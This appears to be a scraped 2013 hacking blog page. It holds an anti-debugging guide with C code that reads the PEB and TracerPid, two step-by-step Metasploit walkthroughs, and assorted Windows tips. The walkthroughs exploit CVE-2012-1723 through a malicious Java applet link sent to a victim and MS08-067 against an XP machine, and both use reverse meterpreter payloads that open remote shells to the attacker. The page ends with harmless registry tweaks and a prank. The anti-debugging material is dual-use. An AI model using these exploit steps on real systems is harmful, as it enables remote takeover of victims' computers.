
Guide to Anti-Debugging - Overview, Techniques and Approaches

I have been nagged a lot regarding guest posts, and almost 90% of them are related to some news, social media bullshit and half-baked security crescendo. Until recently, I was contacted by amiable folks at Infosec Institute with a good article on Anti-Debugging. This is an article by Dejan Lukan, a security researcher at Infosec Institute, in which he discusses the anti-debugging techniques in an objective and direct manner. I loved the implementation part; it reminded me of my rev days (you can learn about how to reverse Winrar or just have a look at a real noob's guide to reverse some more stuff), and more importantly Dejan explains how to stop (read: slow down) people from reversing your code. Hope you will enjoy it.

Before we begin, we must mention that it’s impossible to completely prevent reversing. What is possible is that we can place as many obstacles on the way as we want to make the process slow enough that reverse engineers will give up. Actually there are hardware implementations where you can buy a black box that attaches to your computer which can do the encryption/decryption for you, but this is far from being used in everyday life.
Techniques to Harden Reverse Engineering

The most basic approaches to harden the reverse engineering of programs are the following [1]:
  1. Eliminating symbolic information
  2. Obfuscating the program
  3. Embedding anti-debugger code
When eliminating symbolic information, we're removing the textual information from the program, which means we're stripping all symbolic information from the program executable. In bytecode programs, the executable often contains large amounts of internal symbolic information such as class names, class member names and the names of instantiated global objects. By removing every symbol from the executable or by renaming every symbol, the reverser is faced with a bigger problem than usual, because symbol names alone can often be used to gather enough information about what a function does, which simplifies the reverse engineering work.
This can easily be done in C/C++ programs, where we only have to append a few compiler flags to the command line that compiles the program into the executable. It's much harder with programming languages like Java and .NET, where those symbols are used internally to reference variables, functions, etc. This is also the reason why Java and .NET programs can easily be converted into a pretty good source code of the original program. We can still strip the symbols from such programs by renaming all the symbols from their meaningful names into meaningless representations, which effectively does the job.
Besides stripping the executable symbols, we can also obfuscate the program. When obfuscating a program, we're basically changing the code of the program without actually changing the logic behind it, so the program does the same as before but its code is far less readable. Here we have two techniques that can achieve that:
  • Encoding: With encoding, we must add the decoding instructions that decode the whole program before it's being run. This can be done by appending the decoding instructions at the end of the program and changing the entry point to point to the decoding instructions. When the program is run, the decoding instructions are executed first, which decodes the whole program into its original form. After that, we must jump to the start of the program and actually run the original instructions as if the encoding didn't even happen.
  • Packing: When packing the executable, we're basically reducing the size of the executable as well as encrypting it. When such a program is run, it must first be decoded in memory and then run.
By obfuscating the program with nonstandard encoders/packers, we can greatly complicate the task of reverse engineering the executable, but in the end a persistent reverse engineer will nevertheless be able to bypass that and get the non-obfuscated version of the executable, which can easily be reversed.
Last but not least, we can embed anti-debugger code: code included in the executable that detects whether the program is currently being debugged. If that happens, the program terminates itself prematurely without actually executing the functions that would normally be executed if it weren't running under a debugger.
Antidebugging

Before discussing how anti-debugging tricks do their magic, we must first talk about how the debugger is able to debug the program. We know that we can stop and resume the program with the use of either software or hardware breakpoints.
When using software breakpoints, we’re replacing the instruction on which we’ve set the breakpoint with the INT 3 instruction (at least on the x86 architecture), which is a special software interrupt. In this case, we’re passing the value 3 to the instruction INT, which means that we’re generating the software interrupt 3. This causes the function pointed to by the 3rd vector in the interrupt address table (IAT) to be executed. I guess we’re all familiar with the INT 80 interrupt that makes a system call on Linux systems.
The INT 3 instruction temporarily replaces the current instruction in a running program. This is also a way for the debugger to know that a software breakpoint has occurred and the program execution should be stopped. After that, the debugger replaces the INT 3 instruction with the original instruction so the program can continue without the loss of instructions, which can otherwise cause abnormal program behavior.
When we use a hardware breakpoint, it’s the processor’s job to know when the breakpoint has been hit and the program has to be stopped. This is why the program is not modified when a hardware breakpoint is set.
When the breakpoint is hit, the program is stopped and we can safely execute instructions in our favorite debugger. At that point, we can run instructions step-by-step, either by stepping into functions or by stepping over them. If we're interested in what a function does, we need to step into it; otherwise we can safely ignore the function and step over it. When stepping through the code, each instruction is executed on its own and then the program is again stopped, so we're able to analyze what the instruction has just done.

When stepping through the code with a debugger, the Trap Flag (TF) in the EFLAGS register is used. When the TF is enabled, an interrupt will be generated after every executed instruction, so we get the feeling of stepping through the program instruction by instruction.

IsDebuggerPresent

The IsDebuggerPresent is a Windows API function, which we can see on the picture below:

The function doesn’t take any arguments and returns a Boolean value notifying us whether the program is running under a debugger or not. This function can be used to trivially detect whether a debugger is being used to run the program. The function uses the Process Environment Block (PEB) to get information about whether the user-mode debugger is used.
Let’s create a simple program that prints the number 0 or 1 if the debugger is present or not. We can do that by first creating an empty console project under Visual Studio C++ and then changing the code of the main cpp file into the following:
// isdebuggerpresent.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <windows.h>   // IsDebuggerPresent
#include <stdio.h>     // printf, getchar

int _tmain(int argc, _TCHAR* argv[])
{
    int num;
    // IsDebuggerPresent() reads PEB->BeingDebugged for the current process
    if(IsDebuggerPresent()) {
        num = 0;   // running under a user-mode debugger
    }
    else {
        num = 1;   // no debugger attached
    }

    printf("Number: %d\n", num);

    /* wait so the console window stays open */
    getchar();

    return 0;
}

The program prints "Number: 0" if the debugger is present and "Number: 1" if it is not. If we run the application under Visual Studio, the program will display the number 0 because it's being run under a debugger. This can be seen on the picture below:

Let's also run the program under OllyDbg to be sure that the number 0 is displayed. This can be quickly confirmed by loading the executable and running it. On the picture below, we can see that the number 0 was printed when the program was run under the OllyDbg debugger:

But if we run the same program under normal cmd.exe, it will display the number 1. This can be seen on the picture below:

We can see that the IsDebuggerPresent API function call works as expected, but that the function call is easy to detect and bypass. This is because we can quickly find this function call in the executable and delete it or bypass it. To do this, we can simply open the executable in Ida debugger and check out the Imports table to verify if that function exists somewhere in there. We’re right, the function IsDebuggerPresent is listed among all the imported functions as we can see on the picture below:

This is a clear indication that the executable is using the function to do something different when the debugger is attached to the executable. We can also locate the exact instructions that are used to call that function. The whole Ida graph of the main function that does exactly the same as the main function from the C++ source code above is presented on the picture below:

We can see that, at first, we’re initializing the stack for the function and calling the IsDebuggerPresent function. After that, we’re testing the returned value in eax against itself to determine whether a true or false value was returned. If the eax holds a value different than 0 (1 in our case), then the zero flag will be set and the first box that sets the [ebp+num] to 0 is called. This is exactly what happens now, because we’re running the program under a debugger, but otherwise the block that sets the [ebp+num] to 1 is called. After that, we’re just moving the value of [ebp+num] into the register eax and printing it with the printf function.
If we now set the breakpoint on the call to the IsDebuggerPresent function and rerun the program, the execution will be stopped right where we want it. After the breakpoint has been hit, we can step into the function to see what the function actually does. On the picture below, we can see the function in question:

We can see that the function is pretty simple: we're loading the address of the currently active thread's information block (TIB) into the register eax and then accessing the structure member that's located at offset 0x30; the PEB data structure lies at that offset. After that, we're loading the address of the PEB into eax and then accessing its data member at offset 0x2, which holds the data member named BeingDebugged. Thus, we've successfully taken a look at what the IsDebuggerPresent function actually does and how it does it. We can see that it's very simple and not really hard to bypass.

We can determine that IsDebuggerPresent is being used when we try to reverse engineer an executable and the program terminates prematurely, a different execution path is taken, or something else unexpected happens. In such cases, we must first check the Imports table to see whether the IsDebuggerPresent function is called anywhere in the executable. If that is the case, we can simply delete the instructions that call the IsDebuggerPresent function, so it won't bother us when reversing the executable.
On the other hand, if we’re developing a program and we would like to use the IsDebuggerPresent function call, we can copy the above instructions directly into our code, so that we’re not actually calling the IsDebuggerPresent function directly, but using its function body instructions to figure out whether the debugger is being used to run the executable. This is just another trick so that reverse engineers won’t immediately notice the use of IsDebuggerPresent function call and will make the debugging slightly more complicated.
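As an added example (not from the original article or from Infosec Institute), the following C program implements the inline check suggested above, reading BeingDebugged at PEB+0x2 through the TEB (offset 0x30 on x86, 0x60 on x64) instead of importing IsDebuggerPresent; it goes beyond the page's Windows case by adding the Linux equivalent, the TracerPid field of /proc/self/status, so the same program builds on both platforms. The names parse_tracer_pid and debugger_present are mine, and the Linux branch is an assumption not covered by the article.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Extract the value of the "TracerPid:" field from the text of a Linux
 * /proc/self/status file. Returns the tracer's PID (0 means no tracer is
 * attached) or -1 when the field is absent. Pure parsing, so it can be
 * exercised on constructed input without a real debugger attached. */
long parse_tracer_pid(const char *status_text)
{
    static const char key[] = "TracerPid:";
    const char *p = strstr(status_text, key);
    if (p == NULL)
        return -1;
    p += sizeof(key) - 1;
    while (*p == ' ' || *p == '\t')
        p++;
    return strtol(p, NULL, 10);
}

#ifdef _WIN32
#include <intrin.h>
/* Inline replacement for IsDebuggerPresent(): read PEB->BeingDebugged
 * directly. The TEB holds the PEB pointer at offset 0x30 (x86) or 0x60
 * (x64); BeingDebugged is the byte at PEB+0x2, exactly what the article's
 * disassembly showed. No import of IsDebuggerPresent appears in the binary. */
int debugger_present(void)
{
#ifdef _WIN64
    const unsigned char *peb = (const unsigned char *)__readgsqword(0x60);
#else
    const unsigned char *peb = (const unsigned char *)__readfsdword(0x30);
#endif
    return peb[2] != 0;
}
#else
/* Linux equivalent (assumption, not on the page): the kernel records the
 * PID of any ptrace tracer in /proc/self/status as "TracerPid:". */
int debugger_present(void)
{
    char buf[8192];
    size_t n;
    FILE *f = fopen("/proc/self/status", "r");
    if (f == NULL)
        return 0;            /* cannot tell; assume no debugger */
    n = fread(buf, 1, sizeof(buf) - 1, f);
    fclose(f);
    buf[n] = '\0';
    return parse_tracer_pid(buf) > 0;
}
#endif

/* Same observable behaviour as the article's program: 0 under a debugger,
 * 1 otherwise. */
int main(void)
{
    int num = debugger_present() ? 0 : 1;
    printf("Number: %d\n", num);
    return 0;
}
```

Like the PEB byte, TracerPid is process state a debugger can patch or the reverser can simply bypass at the branch, so it delays analysis rather than preventing it.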
Conclusion

For a deeper understanding of reverse engineering, check out the reverse engineering training course offered by the InfoSec Institute. In this article we've seen a few techniques to harden the reverse engineering process. The technique easiest to bypass is symbol elimination, where we delete all the symbols present in the executable. This effectively makes the names of the functions unavailable when debugging, which leaves it up to the debugger to name the functions on its own. Another technique is program obfuscation, which can be a pretty simple operation like XORing the whole executable and then running it, but it can also be pretty complicated. Things get further complicated if we combine obfuscation with anti-reversing techniques, which detect if the program is being reversed and terminate the program prematurely if so, greatly hardening the reverse engineering of the executable.
References:
[1]: Reversing: Secrets of Reverse Engineering, Eldad Eilam.


~ Saturday, 4 May 2013 0 comments

Hacking a Remote PC by Exploiting the Java Applet Field Bytecode Verifier Cache Remote Code Execution

CVE-2012-1723: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirement:

  • Attacker machine: Backtrack
  • Victim machine: Windows (with an unpatched JRE version installed)
Step 1: Launch the Metasploit console
Open the Terminal in the attacker machine (Backtrack).
Type "msfupdate"; this will update Metasploit with the latest modules.
Now type "msfconsole" to get an interactive session with the Metasploit framework.

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the below commands:


msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don't know what I am talking about, please read my previous tutorial.

Step 3:
If you follow the above commands correctly, you will get the following result.

Copy the URL and open the link in the victim machine. Once the URL is loaded in the victim machine, it will launch the exploit and create a new session.

Now type "sessions"; this will show the list of active sessions.

Type "sessions -i 1"; this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact with and control the target.

References:
  • POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
  • Metasploit Module: http://www.exploit-db.com/exploits/19717/

~ Friday, 3 May 2013 0 comments

[Metasploit Tutorial] Hacking Windows XP using an IP Address


Do you think it is possible to hack someone's computer with just an IP address? The answer is yes, if they are using an unpatched (vulnerable) OS. If you don't believe me, then read the full article.

In this article I am going to demonstrate how to hack a remote computer by exploiting the parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service (CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service vulnerability.

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to a vulnerable system results in complete compromise of the vulnerable computer.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. However, attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:

  • VirtualBox
  • Backtrack 5
  • Target OS(XP)
Step 1:

Create two virtual machines (VMs), namely "Target" and "BT5". Install XP inside the Target VM and Backtrack inside BT5. Start the two VMs.

If you don't know how to create virtual machines, then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open the command prompt in the Target machine (XP). Type "ipconfig" to find the IP address of the Target system.

Hackers use different methods for finding the IP address of a victim, for example by sending a link that captures the IP details, or by using Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine. For this purpose, we are going to use the nmap tool.

Open the Terminal in the BT5 machine (Backtrack) and type "nmap -O 192.168.56.12". Here 192.168.56.12 is the IP address of the Target machine. If you look at the result, you can find the list of open ports and the OS version.


Step 4: Metasploit
Now open the Terminal in the BT5 machine (Backtrack) and type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the search command to find the exploit modules with the keyword netapi. Type "search netapi". Now you can see the list of modules matching netapi.

We are going to exploit MS08-067, so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let us use the reverse TCP payload for this exploit as well. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10". Here 192.168.56.10 is the IP address of the Backtrack machine. You can find the IP address by typing the 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12". Here 192.168.56.12 is the IP address of the Target machine.

Step 7: Exploiting
OK, it is time to exploit the vulnerability: type "exploit" in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using Meterpreter. For example, typing "screenshot" will grab a screenshot of the victim system.

~ 0 comments

10 System Admin Tools to Help You Secure Your Network



System admins are frequently bombarded with security concerns, requests, alerts, news items, “did you see this?!” emails, and more. Keeping up with all the aspects of network security can seem like an overwhelming task, but in this post we’re going to look at ten tools a system admin can use to help secure their network. Some you may be familiar with, like network security software, while others may come as a surprise, like your email client; but all will help you to stay ahead of the bad guys, keep yourself informed of the latest threats, and maintain the security of your network.

1. Network security software
When we talk about network security software, we’re talking about a class of product more than any specific tool, and how important it is for you to have an application or small group of applications that can help you to accomplish most of your tasks. There are simply too many things for any one admin to do by hand, and network security software applications help to automate the heavy lifting and ensure that you can keep up with the workload. Look for network security software that multitasks. Think about it as a Swiss Army knife of software packages that includes many of the other items on this list.

2. Vulnerability scanner
A good vulnerability scanner is a key part of any toolkit, and should be used by server admins and security engineers alike. The top network security software apps will include a scanner that has a database of the thousands of vulnerabilities that could exist on your network, so that you can quickly, easily and regularly scan your network to ensure you systems are up-to-date, configured properly and secured.

3. Port scanner
A port scanner is another regular tool that should be in your network security software application. Attackers regularly scan your Internet connection looking for ways in and so should you. But you should also scan internally so you can find unauthorized services or misconfigured systems, and to validate your internal firewalls are set up correctly.

4. Patching software
Patching operating systems and third party applications is one of the most important, regularly recurring tasks a sys admin has. Network security software that can automate this, and handle the hundreds of other applications on your network, is the only realistic way you can keep up with this.

5. Auditing software
Auditing software may strike you as a strange recommendation at first, but consider all those apps you are trying to patch. How can you be sure you have no vulnerabilities on your systems if your users can install anything on your systems? How are you going to maintain licensing compliance if you don't know who has installed what? Network security software may also include software and hardware inventory components to help you stay informed and secure.

6. Secure remote clients
Telnet, older versions of PCAnyWhere and several of the web-based remote access apps that are out there all have a common issue - they’re not secure. Use SSH v2 or later for secure access to all CLI-based systems, and the most secure versions of Remote Desktop Protocol to manage Windows boxes. Using strong encryption, good passwords, lockout policies and, when possible, mutual authentication between client and host, will help to ensure no one sniffs credentials or brute-forces their way into a system. If you have two-factor authentication in your environment, ensure that every system possible uses it to further reduce your risk from unauthorized access.

7. A good network analyzer
Whether you like the open source Wireshark, the free Microsoft tool NetMon, or one of the many other commercial network analysis tools, having a good "sniffer" is key to helping secure and analyze systems. There is simply no more effective way to figure out just what is going on between networked systems than to see the traffic first hand.

8. Network tools
Whenever you are dealing with connections from foreign systems, you will find the need to check network addresses, routes and more. Having good tools like DIG, WHOIS, HOST, TCPING and others close at hand makes network evaluation a breeze.

9. Log parsing software
Securing systems means going through logs; lots of them. Web logs, access logs, system logs, security logs, SNMP logs, syslog logs – the list goes on and on. Having software that can quickly and easily parse through logs is critical. Everyone has their favorite. Some install locally like LogParser, while others run on servers like Splunk. Whichever you prefer, get a good log parser to help wade through what can be millions of entries quickly and easily so you can find events you need to check.

10. Your email client
Knowledge is power, and the best way to amass that knowledge is to stay informed. Whether you subscribe to email bulletins, security alerts, or RSS feeds, your email client can provide you the first indications that something new is out there, and also what you need to do to protect your systems from the threat. Zero day exploits, out of band patches, best practices and more, can all be yours if you simply join the right distribution lists and subscribe to the right lists.

These 10 system admin tools are a great start towards building your toolkit for security. Network security software plays a major role in this toolkit, which you supplement with other tools and the information you need to maintain a secure environment.

This guest post was provided by Emmanuel Carabott on behalf of GFI Software Ltd. Learn more about the importance of a secure business network by downloading the free eBook: A first aid kit for SysAdmins. All product and company names herein may be trademarks of their respective owners.

~ Thursday, 2 May 2013 0 comments

Take a screenshot of any site

Friends, do you want to take a screenshot of any site? Then follow these steps:

1. Go to this site.
2. Copy the link, paste it in the site and click on "get image".

~ Sunday, 14 April 2013 0 comments

Convert FAT32 to NTFS without losing data

How to Do It:

You don't need to install a program to change the file system from FAT32 to NTFS.
1. Press the Start button.
2. Go to Run…
3. Type in "cmd" without the quotes, press OK.
4. Go to your C:\ folder by typing in cd\ (or "cd.." repeatedly until you have reached C:\). See above image. Likewise, typing in "cd c:\" works as well.
5. Go to your "My Computer" icon and note the letter that stands in front of the drive you want to convert.
6. Back in cmd, type in "CONVERT X: /FS:NTFS" (without the quotes). The X is the letter of your system drive or external drive (see Step 5).
7. On the question 'Convert lost chains to files (Y/N)?' press 'y' and continue.
8. cmd will now check the file system and the rest. When cmd finishes, your file system is converted to NTFS. You can close cmd. (If you want to check whether it really finished, go to 'My Computer', right-click on the drive and select 'Properties' to see what kind of file system it has.)
9. If cmd says 'X: was not converted to NTFS, the conversion failed', etc., you must follow the next steps.
10. As you can see above, my cmd failed the first time. Next solution.
11. Type in "chkdsk X: /f", where X is the letter of your drive. Wait a while for it to finish.
12. You'll be asked 'Convert lost chains to files (Y/N)?'; press 'y' and continue. Wait for it to finish.
13. After this, cmd will say that converting was successful. Check it by going to your computer and single-clicking on the drive to see what kind of file system your drive has. You may need to repeat step 6.

~ 0 comments

Remove the shortcut arrow from any icon

You see an arrow on the desktop shortcut icons and wonder how to remove it; now you can remove it by following these steps:

Go to Start and select Run. In the Run box type RegEdit (Registry Editor). Then go to the path shown below:
HKEY_CLASSES_ROOT\lnkfile
Then on the right side you can see some entries, among which is the entry "IsShortcut"; just select it and delete it.
Then again follow the path shown below:
HKEY_CLASSES_ROOT\piffile
Then, as usual, on the right side you can see some entries, among which is the entry "IsShortcut"; just select it and delete it.

Now restart Windows and you are done.

~ 0 comments

How to know who used your PC in your absence

Today we are posting a very important trick for your safety. You can find out what has been used on your computer in your absence. Yes, now you can know completely which data was used by others.

Just follow the simple steps below:

Step 1) Click on Start >> Run and type eventvwr.msc. (Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.)
Step 2) We want the System log. Click on "System" in the left-hand column for a list of events. Go there and check.

Enjoy.

~ 0 comments

Make a fool of your friends with this trick

Making a fool of friends and colleagues is the most entertaining task. This post will show you a method by which you can change the hardware description of your computer and fool your friends into believing that you have the latest version of a processor which is yet to be launched.

Just follow the simple steps:

Step 1. Go to Start > Run... and type REGEDIT. This will open the Registry Editor.
Step 2. Select HKEY_LOCAL_MACHINE.
Step 3. Similarly select HARDWARE, then DESCRIPTION, then CentralProcessor and finally select 0.
Step 4. On the right-hand side of the window, right-click on ProcessorNameString and click Modify.
Step 5. Modify the name to any name you want, let's say Pentium 5 I11 as shown below. All done.

Hit OK and close the Registry Editor. Now check the system properties by right-clicking on My Computer and selecting Properties. You would get

~ 0 comments